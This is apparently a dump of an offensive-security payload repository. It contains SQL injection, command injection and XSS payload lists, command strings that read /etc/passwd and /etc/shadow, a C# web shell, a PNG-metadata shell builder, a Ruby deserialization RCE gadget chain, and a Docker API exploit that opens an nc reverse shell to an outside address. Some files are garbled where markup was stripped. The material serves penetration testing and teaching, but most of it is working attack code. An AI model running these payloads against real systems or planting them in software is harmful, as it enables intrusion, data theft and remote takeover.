char(0x65) + char(0x72),char(0x64) 11 | ' or 1=1 -- 12 | ' union (select @@version) -- 13 | ' union (select NULL, (select @@version)) -- 14 | ' union (select NULL, NULL, (select @@version)) -- 15 | ' union (select NULL, NULL, NULL, (select @@version)) -- 16 | ' union (select NULL, NULL, NULL, NULL, (select @@version)) -- 17 | ' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- 18 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Metadata/Build_image_to_LFI.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function 2 | from PIL import Image 3 | 4 | # Shellcodes - Bypass included : Keyword Recognition : System, GET, php 5 | # --- How to use : http://localhost/shell.php?c=echo%20'

';ls
 6 | 
 7 | #shellcode  = ""
 9 | # --- How to use : http://localhost/shell.php?_=system&__=echo%20'';ls
10 | shellcode2 = ";').($_^'/');?>"
11 | 
12 | 
13 | print("\n[+] Advanced Upload - Shell inside metadatas of a PNG file")
14 | 
15 | # Create a backdoored PNG
16 | print(" - Creating a payload.png")
17 | im = Image.new("RGB", (10,10), "Black")
18 | im.info["shell"] = shellcode
19 | reserved = ('interlace', 'gamma', 'dpi', 'transparency', 'aspect')
20 | 
21 | # undocumented class
22 | from PIL import PngImagePlugin
23 | meta = PngImagePlugin.PngInfo()
24 | 
25 | # copy metadata into new object
26 | for k,v in im.info.items():
27 | 	if k in reserved: continue
28 | 	meta.add_text(k, v, 0)
29 | im.save("payload.png", "PNG", pnginfo=meta)
30 | 
31 | print("Done")


--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
 1 | # CONTRIBUTING
 2 | 
 3 | PayloadsAllTheThings' Team :heart: pull requests :)
 4 | Feel free to improve with your payloads and techniques !
 5 | 
 6 | You can also contribute with a :beers: IRL, or using the sponsor button.
 7 | 
 8 | ## Techniques Folder
 9 | 
10 | Every section should contains the following files, you can use the `_template_vuln` folder to create a new technique folder:
11 | 
12 | - README.md - vulnerability description and how to exploit it, including several payloads, more below
13 | - Intruder - a set of files to give to Burp Intruder
14 | - Images - pictures for the README.md
15 | - Files - some files referenced in the README.md
16 | 
17 | ## README.md format
18 | 
19 | Use the following example to create a new technique `README.md` file.
20 | 
21 | ```markdown
22 | # Vulnerability Title
23 | 
24 | > Vulnerability description
25 | 
26 | ## Summary
27 | 
28 | * [Tools](#tools)
29 | * [Something](#something)
30 |   * [Subentry 1](#sub1)
31 |   * [Subentry 2](#sub2)
32 | * [References](#references)
33 | 
34 | ## Tools
35 | 
36 | - [Tool 1](https://example.com)
37 | - [Tool 2](https://example.com)
38 | 
39 | ## Something
40 | 
41 | Quick explanation
42 | 
43 | ## References
44 | 
45 | - [Blog title - Author, Date](https://example.com)
46 | ```
47 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration IIS web.config/web.config:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 |    
 4 |       
 5 |          
 6 |       
 7 |       
 8 |          
 9 |             
10 |                
11 |             
12 |             
13 |                
14 |             
15 |          
16 |       
17 |    
18 |    
19 | 
20 | 
21 | ")
23 | Response.write("
24 | ")
25 | Set wShell1 = CreateObject("WScript.Shell")
26 | Set cmd1 = wShell1.Exec("whoami")
27 | output1 = cmd1.StdOut.Readall()
28 | set cmd1 = nothing: Set wShell1 = nothing
29 | Response.write(output1)
30 | Response.write("
31 | 
32 | –>
33 | 
34 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Zip Slip/README.md:
--------------------------------------------------------------------------------
 1 | # Zip Slip
 2 | 
 3 | > The vulnerability is exploited using a specially crafted archive that holds directory traversal filenames (e.g. ../../shell.php). The Zip Slip vulnerability can affect numerous archive formats, including tar, jar, war, cpio, apk, rar and 7z. The attacker can then overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victim’s machine. 
 4 | 
 5 | ## Summary
 6 | 
 7 | - [Detection](#detection)
 8 | - [Tools](#tools)
 9 | * [Exploits](#exploits)
10 |   * [Basic Exploit](#basic-exploit)
11 | - [Additional Notes](#additional-notes)
12 | 
13 | ## Detection
14 | 
15 | - Any zip upload page on the application
16 | 
17 | ## Tools
18 | 
19 | - evilarc [https://github.com/ptoomey3/evilarc](https://github.com/ptoomey3/evilarc)
20 | 
21 | ## Exploits
22 | 
23 | ### Basic Exploit
24 | 
25 | ```python
26 | python evilarc.py shell.php -o unix -f shell.zip -p var/www/html/ -d 15
27 | ```
28 | 
29 | ### Additional Notes
30 | - For affected libraries and projects, visit https://github.com/snyk/zip-slip-vulnerability
31 | 
32 | ## References
33 | 
34 | - [Zip Slip Vulnerability - Snyk Ltd, 2019](https://snyk.io/research/zip-slip-vulnerability)
35 | - [Zip Slip - snyk, 2019](https://github.com/snyk/zip-slip-vulnerability)
36 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Resize/exploit_PNG_110x110.php:
--------------------------------------------------------------------------------
 1 | 


--------------------------------------------------------------------------------
/SQL Injection/Intruder/FUZZDB_MSSQL-WHERE_Time.txt:
--------------------------------------------------------------------------------
 1 |  waitfor delay '0:0:20' /* 
 2 |  waitfor delay '0:0:20' --
 3 | ' waitfor delay '0:0:20' /* 
 4 | ' waitfor delay '0:0:20' --
 5 | " waitfor delay '0:0:20' /* 
 6 | " waitfor delay '0:0:20' --
 7 | ) waitfor delay '0:0:20' /* 
 8 | ) waitfor delay '0:0:20' --
 9 | )) waitfor delay '0:0:20' /* 
10 | )) waitfor delay '0:0:20' --
11 | ))) waitfor delay '0:0:20' /* 
12 | ))) waitfor delay '0:0:20' --
13 | )))) waitfor delay '0:0:20' /* 
14 | )))) waitfor delay '0:0:20' --
15 | ))))) waitfor delay '0:0:20' --
16 | )))))) waitfor delay '0:0:20' --
17 | ') waitfor delay '0:0:20' /* 
18 | ') waitfor delay '0:0:20' --
19 | ") waitfor delay '0:0:20' /* 
20 | ") waitfor delay '0:0:20' --
21 | ')) waitfor delay '0:0:20' /* 
22 | ')) waitfor delay '0:0:20' --
23 | ")) waitfor delay '0:0:20' /* 
24 | ")) waitfor delay '0:0:20' --
25 | '))) waitfor delay '0:0:20' /* 
26 | '))) waitfor delay '0:0:20' --
27 | "))) waitfor delay '0:0:20' /* 
28 | "))) waitfor delay '0:0:20' --
29 | ')))) waitfor delay '0:0:20' /* 
30 | ')))) waitfor delay '0:0:20' --
31 | ")))) waitfor delay '0:0:20' /* 
32 | ")))) waitfor delay '0:0:20' --
33 | '))))) waitfor delay '0:0:20' /* 
34 | '))))) waitfor delay '0:0:20' --
35 | "))))) waitfor delay '0:0:20' /* 
36 | "))))) waitfor delay '0:0:20' --
37 | ')))))) waitfor delay '0:0:20' /* 
38 | ')))))) waitfor delay '0:0:20' --
39 | ")))))) waitfor delay '0:0:20' /* 
40 | ")))))) waitfor delay '0:0:20' --


--------------------------------------------------------------------------------
/SQL Injection/Intruder/SQL-Injection:
--------------------------------------------------------------------------------
 1 | '
 2 | ''
 3 | `
 4 | ``
 5 | ,
 6 | "
 7 | ""
 8 | /
 9 | //
10 | \
11 | \\
12 | ;
13 | ' or "
14 | -- or # 
15 | ' OR '1
16 | ' OR 1 -- -
17 | " OR "" = "
18 | " OR 1 = 1 -- -
19 | ' OR '' = '
20 | '='
21 | 'LIKE'
22 | '=0--+
23 |  OR 1=1
24 | ' OR 'x'='x
25 | ' AND id IS NULL; --
26 | '''''''''''''UNION SELECT '2
27 | %00
28 | /*…*/ 
29 | +		addition, concatenate (or space in url)
30 | ||		(double pipe) concatenate
31 | %		wildcard attribute indicator
32 | @variable	local variable
33 | @@variable	global variable
34 | # Numeric
35 | AND 1
36 | AND 0
37 | AND true
38 | AND false
39 | 1-false
40 | 1-true
41 | 1*56
42 | -2
43 | 1' ORDER BY 1--+
44 | 1' ORDER BY 2--+
45 | 1' ORDER BY 3--+
46 | 1' ORDER BY 1,2--+
47 | 1' ORDER BY 1,2,3--+
48 | 1' GROUP BY 1,2,--+
49 | 1' GROUP BY 1,2,3--+
50 | ' GROUP BY columnnames having 1=1 --
51 | -1' UNION SELECT 1,2,3--+
52 | ' UNION SELECT sum(columnname ) from tablename --
53 | -1 UNION SELECT 1 INTO @,@
54 | -1 UNION SELECT 1 INTO @,@,@
55 | 1 AND (SELECT * FROM Users) = 1	
56 | ' AND MID(VERSION(),1,1) = '5';
57 | ' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --
58 | Finding the table name
59 | Time-Based:
60 | ,(select * from (select(sleep(10)))a)
61 | %2c(select%20*%20from%20(select(sleep(10)))a)
62 | ';WAITFOR DELAY '0:0:30'--
63 | Comments:
64 | #	    Hash comment
65 | /*  	C-style comment
66 | -- -	SQL comment
67 | ;%00	Nullbyte
68 | `	    Backtick
69 | 


--------------------------------------------------------------------------------
/SQL Injection/Intruder/payloads-sql-blind-MSSQL-WHERE:
--------------------------------------------------------------------------------
 1 |  waitfor delay '0:0:20' /* 
 2 |  waitfor delay '0:0:20' --
 3 | ' waitfor delay '0:0:20' /* 
 4 | ' waitfor delay '0:0:20' --
 5 | " waitfor delay '0:0:20' /* 
 6 | " waitfor delay '0:0:20' --
 7 | ) waitfor delay '0:0:20' /* 
 8 | ) waitfor delay '0:0:20' --
 9 | )) waitfor delay '0:0:20' /* 
10 | )) waitfor delay '0:0:20' --
11 | ))) waitfor delay '0:0:20' /* 
12 | ))) waitfor delay '0:0:20' --
13 | )))) waitfor delay '0:0:20' /* 
14 | )))) waitfor delay '0:0:20' --
15 | ))))) waitfor delay '0:0:20' --
16 | )))))) waitfor delay '0:0:20' --
17 | ') waitfor delay '0:0:20' /* 
18 | ') waitfor delay '0:0:20' --
19 | ") waitfor delay '0:0:20' /* 
20 | ") waitfor delay '0:0:20' --
21 | ')) waitfor delay '0:0:20' /* 
22 | ')) waitfor delay '0:0:20' --
23 | ")) waitfor delay '0:0:20' /* 
24 | ")) waitfor delay '0:0:20' --
25 | '))) waitfor delay '0:0:20' /* 
26 | '))) waitfor delay '0:0:20' --
27 | "))) waitfor delay '0:0:20' /* 
28 | "))) waitfor delay '0:0:20' --
29 | ')))) waitfor delay '0:0:20' /* 
30 | ')))) waitfor delay '0:0:20' --
31 | ")))) waitfor delay '0:0:20' /* 
32 | ")))) waitfor delay '0:0:20' --
33 | '))))) waitfor delay '0:0:20' /* 
34 | '))))) waitfor delay '0:0:20' --
35 | "))))) waitfor delay '0:0:20' /* 
36 | "))))) waitfor delay '0:0:20' --
37 | ')))))) waitfor delay '0:0:20' /* 
38 | ')))))) waitfor delay '0:0:20' --
39 | ")))))) waitfor delay '0:0:20' /* 
40 | ")))))) waitfor delay '0:0:20' --
41 | 


--------------------------------------------------------------------------------
/Dependency Confusion/README.md:
--------------------------------------------------------------------------------
 1 | # Dependency Confusion
 2 | 
 3 | > A dependency confusion attack or supply chain substitution attack occurs when a software installer script is tricked into pulling a malicious code file from a public repository instead of the intended file of the same name from an internal repository.
 4 | 
 5 | ## Summary
 6 | 
 7 | * [Tools](#tools)
 8 | * [Exploit](#exploitation)
 9 | * [References](#references)
10 | 
11 | ## Exploit
12 | 
13 | Look for `npm`, `pip`, `gem` packages, the methodology is the same : you register a public package with the same name of private one used by the company and then you wait for it to be used.
14 | 
15 | ### NPM example
16 | 
17 | * List all the packages (ie: package.json, composer.json, ...)
18 | * Find the package missing from https://www.npmjs.com/
19 | * Register and create a **public** package with the same name
20 |     * Package example : https://github.com/0xsapra/dependency-confusion-expoit
21 | 
22 | ## References
23 | 
24 | * [Exploiting Dependency Confusion - 2 Jul 2021 - 0xsapra](https://0xsapra.github.io/website//Exploiting-Dependency-Confusion)
25 | * [Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies - Alex Birsan - 9 Feb 2021](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)
26 | * [Ways to Mitigate Risk When Using Private Package Feeds - Microsoft - 29/03/2021](https://azure.microsoft.com/en-gb/resources/3-ways-to-mitigate-risk-using-private-package-feeds/)


--------------------------------------------------------------------------------
/SQL Injection/Intruder/Auth_Bypass.txt:
--------------------------------------------------------------------------------
 1 | '-'
 2 | ' '
 3 | '&'
 4 | '^'
 5 | '*'
 6 | ' or ''-'
 7 | ' or '' '
 8 | ' or ''&'
 9 | ' or ''^'
10 | ' or ''*'
11 | "-"
12 | " "
13 | "&"
14 | "^"
15 | "*"
16 | " or ""-"
17 | " or "" "
18 | " or ""&"
19 | " or ""^"
20 | " or ""*"
21 | or true--
22 | " or true--
23 | ' or true--
24 | ") or true--
25 | ') or true--
26 | ' or 'x'='x
27 | ') or ('x')=('x
28 | ')) or (('x'))=(('x
29 | " or "x"="x
30 | ") or ("x")=("x
31 | ")) or (("x"))=(("x
32 | or 1=1
33 | or 1=1--
34 | or 1=1#
35 | or 1=1/*
36 | admin' --
37 | admin' #
38 | admin'/*
39 | admin' or '1'='1
40 | admin' or '1'='1'--
41 | admin' or '1'='1'#
42 | admin' or '1'='1'/*
43 | admin'or 1=1 or ''='
44 | admin' or 1=1
45 | admin' or 1=1--
46 | admin' or 1=1#
47 | admin' or 1=1/*
48 | admin') or ('1'='1
49 | admin') or ('1'='1'--
50 | admin') or ('1'='1'#
51 | admin') or ('1'='1'/*
52 | admin') or '1'='1
53 | admin') or '1'='1'--
54 | admin') or '1'='1'#
55 | admin') or '1'='1'/*
56 | 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
57 | admin" --
58 | admin" #
59 | admin"/*
60 | admin" or "1"="1
61 | admin" or "1"="1"--
62 | admin" or "1"="1"#
63 | admin" or "1"="1"/*
64 | admin"or 1=1 or ""="
65 | admin" or 1=1
66 | admin" or 1=1--
67 | admin" or 1=1#
68 | admin" or 1=1/*
69 | admin") or ("1"="1
70 | admin") or ("1"="1"--
71 | admin") or ("1"="1"#
72 | admin") or ("1"="1"/*
73 | admin") or "1"="1
74 | admin") or "1"="1"--
75 | admin") or "1"="1"#
76 | admin") or "1"="1"/*
77 | 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
78 | 


--------------------------------------------------------------------------------
/Insecure Deserialization/Files/PHP-Serialization-RCE-Exploit.php:
--------------------------------------------------------------------------------
 1 | 
33 | 


--------------------------------------------------------------------------------
/Insecure Deserialization/Files/Ruby_universal_gadget_generate_verify.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | 
 3 | class Gem::StubSpecification
 4 |   def initialize; end
 5 | end
 6 | 
 7 | 
 8 | stub_specification = Gem::StubSpecification.new
 9 | stub_specification.instance_variable_set(:@loaded_from, "|id 1>&2")
10 | 
11 | puts "STEP n"
12 | stub_specification.name rescue nil
13 | puts
14 | 
15 | 
16 | class Gem::Source::SpecificFile
17 |   def initialize; end
18 | end
19 | 
20 | specific_file = Gem::Source::SpecificFile.new
21 | specific_file.instance_variable_set(:@spec, stub_specification)
22 | 
23 | other_specific_file = Gem::Source::SpecificFile.new
24 | 
25 | puts "STEP n-1"
26 | specific_file <=> other_specific_file rescue nil
27 | puts
28 | 
29 | 
30 | $dependency_list= Gem::DependencyList.new
31 | $dependency_list.instance_variable_set(:@specs, [specific_file, other_specific_file])
32 | 
33 | puts "STEP n-2"
34 | $dependency_list.each{} rescue nil
35 | puts
36 | 
37 | 
38 | class Gem::Requirement
39 |   def marshal_dump
40 |     [$dependency_list]
41 |   end
42 | end
43 | 
44 | payload = Marshal.dump(Gem::Requirement.new)
45 | 
46 | puts "STEP n-3"
47 | Marshal.load(payload) rescue nil
48 | puts
49 | 
50 | 
51 | puts "VALIDATION (in fresh ruby process):"
52 | IO.popen("ruby -e 'Marshal.load(STDIN.read) rescue nil'", "r+") do |pipe|
53 |   pipe.print payload
54 |   pipe.close_write
55 |   puts pipe.gets
56 |   puts
57 | end
58 | 
59 | puts "Payload (hex):"
60 | puts payload.unpack('H*')[0]
61 | puts
62 | 
63 | 
64 | require "base64"
65 | puts "Payload (Base64 encoded):"
66 | puts Base64.encode64(payload)


--------------------------------------------------------------------------------
/Insecure Deserialization/Ruby.md:
--------------------------------------------------------------------------------
 1 | # Ruby Deserialization
 2 | 
 3 | ## Marshal.load
 4 | 
 5 | Script to generate and verify the deserialization gadget chain against Ruby 2.0 through to 2.5
 6 | 
 7 | ```ruby
 8 | for i in {0..5}; do docker run -it ruby:2.${i} ruby -e 'Marshal.load(["0408553a1547656d3a3a526571756972656d656e745b066f3a1847656d3a3a446570656e64656e63794c697374073a0b4073706563735b076f3a1e47656d3a3a536f757263653a3a537065636966696346696c65063a0a40737065636f3a1b47656d3a3a5374756253706563696669636174696f6e083a11406c6f616465645f66726f6d49220d7c696420313e2632063a0645543a0a4064617461303b09306f3b08003a1140646576656c6f706d656e7446"].pack("H*")) rescue nil'; done
 9 | ```
10 | 
11 | ## Yaml.load
12 | 
13 | Vulnerable code
14 | ```ruby
15 | require "yaml"
16 | YAML.load(File.read("p.yml"))
17 | ```
18 | 
19 | Exploitation code
20 | ```ruby
21 | --- !ruby/object:Gem::Requirement
22 | requirements:
23 |   !ruby/object:Gem::DependencyList
24 |   specs:
25 |   - !ruby/object:Gem::Source::SpecificFile
26 |     spec: &1 !ruby/object:Gem::StubSpecification
27 |       loaded_from: "|id 1>&2"
28 |   - !ruby/object:Gem::Source::SpecificFile
29 |       spec:
30 | ```
31 | 
32 | 
33 | ## References
34 | 
35 | - [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/)
36 | - [Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/)
37 | - [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online)


--------------------------------------------------------------------------------
/SQL Injection/Intruder/payloads-sql-blind-MySQL-ORDER_BY:
--------------------------------------------------------------------------------
 1 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
 2 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
 3 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
 4 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
 5 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
 6 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
 7 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
 8 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
 9 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
10 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
11 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
12 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
13 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
14 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
15 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
16 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
17 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
18 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
19 | 


--------------------------------------------------------------------------------
/Command Injection/Intruder/command-execution-unix.txt:
--------------------------------------------------------------------------------
 1 | <!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
 2 | <!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
 3 | <!--#exec%20cmd="/usr/bin/id;-->
 4 | <!--#exec%20cmd="/usr/bin/id;-->
 5 | /index.html|id|
 6 | ";id;"
 7 | ';id;'
 8 | ;id;
 9 | ;id
10 | ;netstat -a;
11 | "|id|"
12 | '|id|'
13 | |id
14 | |/usr/bin/id
15 | |id|
16 | "|/usr/bin/id|"
17 | '|/usr/bin/id|'
18 | |/usr/bin/id|
19 | "||/usr/bin/id|"
20 | '||/usr/bin/id|'
21 | ||/usr/bin/id|
22 | |id;
23 | ||/usr/bin/id;
24 | ;id|
25 | ;|/usr/bin/id|
26 | "\n/bin/ls -al\n"
27 | '\n/bin/ls -al\n'
28 | \n/bin/ls -al\n
29 | \n/usr/bin/id\n
30 | \nid\n
31 | \n/usr/bin/id;
32 | \nid;
33 | \n/usr/bin/id|
34 | \nid|
35 | ;/usr/bin/id\n
36 | ;id\n
37 | |usr/bin/id\n
38 | |nid\n
39 | `id`
40 | `/usr/bin/id`
41 | a);id
42 | a;id
43 | a);id;
44 | a;id;
45 | a);id|
46 | a;id|
47 | a)|id
48 | a|id
49 | a)|id;
50 | a|id
51 | |/bin/ls -al
52 | a);/usr/bin/id
53 | a;/usr/bin/id
54 | a);/usr/bin/id;
55 | a;/usr/bin/id;
56 | a);/usr/bin/id|
57 | a;/usr/bin/id|
58 | a)|/usr/bin/id
59 | a|/usr/bin/id
60 | a)|/usr/bin/id;
61 | a|/usr/bin/id
62 | ;system('cat%20/etc/passwd')
63 | ;system('id')
64 | ;system('/usr/bin/id')
65 | %0Acat%20/etc/passwd
66 | %0A/usr/bin/id
67 | %0Aid
68 | %22%0A/usr/bin/id%0A%22
69 | %27%0A/usr/bin/id%0A%27
70 | %0A/usr/bin/id%0A
71 | %0Aid%0A
72 | "& ping -i 30 127.0.0.1 &"
73 | '& ping -i 30 127.0.0.1 &'
74 | & ping -i 30 127.0.0.1 &
75 | & ping -n 30 127.0.0.1 &
76 | %0a ping -i 30 127.0.0.1 %0a
77 | `ping 127.0.0.1`
78 | | id
79 | & id
80 | ; id
81 | %0a id %0a
82 | `id`
83 | $;/usr/bin/id
84 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension ASP/shell.ashx:
--------------------------------------------------------------------------------
 1 | <% @ webhandler language="C#" class="AverageHandler" %>
 2 | 
 3 | using System;
 4 | using System.Web;
 5 | using System.Diagnostics;
 6 | using System.IO;
 7 | 
 8 | public class AverageHandler : IHttpHandler
 9 | {
10 |   /* .Net requires this to be implemented */
11 |   public bool IsReusable
12 |   {
13 |     get { return true; }
14 |   }
15 | 
16 |   /* main executing code */
17 |   public void ProcessRequest(HttpContext ctx)
18 |   {
19 |     Uri url = new Uri(HttpContext.Current.Request.Url.Scheme + "://" +   HttpContext.Current.Request.Url.Authority + HttpContext.Current.Request.RawUrl);
20 |     string command = HttpUtility.ParseQueryString(url.Query).Get("cmd");
21 | 
22 |     ctx.Response.Write("
Command: ");
23 |     ctx.Response.Write("");
24 |     ctx.Response.Write("");
25 | 
26 |     /* command execution and output retrieval */
27 |     ProcessStartInfo psi = new ProcessStartInfo();
28 |     psi.FileName = "cmd.exe";
29 |     psi.Arguments = "/c "+command;
30 |     psi.RedirectStandardOutput = true;
31 |     psi.UseShellExecute = false;
32 |     Process p = Process.Start(psi);
33 |     StreamReader stmrdr = p.StandardOutput;
34 |     string s = stmrdr.ReadToEnd();
35 |     stmrdr.Close();
36 | 
37 |     ctx.Response.Write(System.Web.HttpUtility.HtmlEncode(s));
38 |     ctx.Response.Write("");
39 |     ctx.Response.Write("");
40 |     ctx.Response.Write("By @Hypn, for educational purposes only.");
41 |  }
42 | }
43 | 


--------------------------------------------------------------------------------
/XSS Injection/Intruders/xss_payloads_quick.txt:
--------------------------------------------------------------------------------
 1 | javascript:alert(1)//INJECTX
 2 | //INJECTX
 4 | //INJECTX
 5 | INJECTX HOVER
 6 |  onmouseover="document.cookie=true;">//INJECTX
 7 | alert(1)>//INJECTX
 8 | INJECTX
 9 | 
10 | a//INJECTX
18 | a
20 | //INJECTX
35 | //INJECTX
36 | //INJECTX
37 | \x3csVg/">
<script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
 5 | javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
 6 | javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
 7 | javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
 8 | javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
 9 | javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
10 | javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
11 | javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
12 | --></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
13 | /</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
14 | javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
15 | /</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
16 | 


--------------------------------------------------------------------------------
/XSS Injection/Intruders/0xcela_event_handlers.txt:
--------------------------------------------------------------------------------
  1 | FSCommand
  2 | onAbort
  3 | onActivate
  4 | onAfterPrint
  5 | onAfterUpdate
  6 | onBeforeActivate
  7 | onBeforeCopy
  8 | onBeforeCut
  9 | onBeforeDeactivate
 10 | onBeforeEditFocus
 11 | onBeforePaste
 12 | onBeforePrint
 13 | onBeforeUnload
 14 | onBeforeUpdate
 15 | onBegin
 16 | onBlur
 17 | onBounce
 18 | onCellChange
 19 | onChange
 20 | onClick
 21 | onContextMenu
 22 | onControlSelect
 23 | onCopy
 24 | onCut
 25 | onDataAvailable
 26 | onDataSetChanged
 27 | onDataSetComplete
 28 | onDblClick
 29 | onDeactivate
 30 | onDrag
 31 | onDragDrop
 32 | onDragEnd
 33 | onDragEnter
 34 | onDragLeave
 35 | onDragOver
 36 | onDragStart
 37 | onDrop
 38 | onEnd
 39 | onError
 40 | onErrorUpdate
 41 | onFilterChange
 42 | onFinish
 43 | onFocus
 44 | onFocusIn
 45 | onFocusOut
 46 | onHashChange
 47 | onHelp
 48 | onInput
 49 | onKeyDown
 50 | onKeyPress
 51 | onKeyUp
 52 | onLayoutComplete
 53 | onLoad
 54 | onLoseCapture
 55 | onMediaComplete
 56 | onMediaError
 57 | onMessage
 58 | onMouseDown
 59 | onMouseEnter
 60 | onMouseLeave
 61 | onMouseMove
 62 | onMouseOut
 63 | onMouseOver
 64 | onMouseUp
 65 | onMouseWheel
 66 | onMove
 67 | onMoveEnd
 68 | onMoveStart
 69 | onOffline
 70 | onOnline
 71 | onOutOfSync
 72 | onPaste
 73 | onPause
 74 | onPopState
 75 | onProgress
 76 | onPropertyChange
 77 | onReadyStateChange
 78 | onRedo
 79 | onRepeat
 80 | onReset
 81 | onResize
 82 | onResizeEnd
 83 | onResizeStart
 84 | onResume
 85 | onReverse
 86 | onRowDelete
 87 | onRowExit
 88 | onRowInserted
 89 | onRowsEnter
 90 | onScroll
 91 | onSeek
 92 | onSelect
 93 | onSelectStart
 94 | onSelectionChange
 95 | onStart
 96 | onStop
 97 | onStorage
 98 | onSubmit
 99 | onSyncRestored
100 | onTimeError
101 | onTrackChange
102 | onURLFlip
103 | onUndo
104 | onUnload
105 | seekSegmentTime
106 | 


--------------------------------------------------------------------------------
/CVE Exploits/Docker API RCE.py:
--------------------------------------------------------------------------------
 1 | from __future__ import print_function
 2 | import requests
 3 | import logging
 4 | import json
 5 | import urllib.parse
 6 | 
 7 | # NOTE
 8 | # Enable Remote API with the following command
 9 | # /usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
10 | # This is an intended feature, remember to filter the port 2375..
11 | 
12 | name          = "docker"
13 | description   = "Docker RCE via Open Docker API on port 2375"
14 | author        = "Swissky"
15 | 
16 | # Step 1 - Extract id and name from each container
17 | ip   = "127.0.0.1"
18 | port = "2375"
19 | data = "containers/json"
20 | url  = "http://{}:{}/{}".format(ip, port, data)
21 | r = requests.get(url)
22 | 
23 | if r.json:
24 |     for container in r.json():
25 |         container_id   = container['Id']
26 |         container_name = container['Names'][0].replace('/','')
27 |         print((container_id, container_name))
28 | 
29 |         # Step 2 - Prepare command
30 |         cmd = '["nc", "192.168.1.2", "4242", "-e", "/bin/sh"]'
31 |         data = "containers/{}/exec".format(container_name)
32 |         url = "http://{}:{}/{}".format(ip, port, data)
33 |         post_json = '{ "AttachStdin":false,"AttachStdout":true,"AttachStderr":true, "Tty":false, "Cmd":'+cmd+' }'
34 |         post_header = {
35 |             "Content-Type": "application/json"
36 |         }
37 |         r = requests.post(url, json=json.loads(post_json))
38 | 
39 | 
40 |         # Step 3 - Execute command
41 |         id_cmd = r.json()['Id']
42 |         data = "exec/{}/start".format(id_cmd)
43 |         url = "http://{}:{}/{}".format(ip, port, data)
44 |         post_json = '{ "Detach":false,"Tty":false}'
45 |         post_header = {
46 |             "Content-Type": "application/json"
47 |         }
48 |         r = requests.post(url, json=json.loads(post_json))
49 |         print(r)


--------------------------------------------------------------------------------
/File Inclusion/Intruders/Linux-files.txt:
--------------------------------------------------------------------------------
 1 | /etc/passwd
 2 | /etc/group
 3 | /etc/hosts
 4 | /etc/motd
 5 | /etc/issue
 6 | /etc/bashrc
 7 | /etc/apache2/apache2.conf
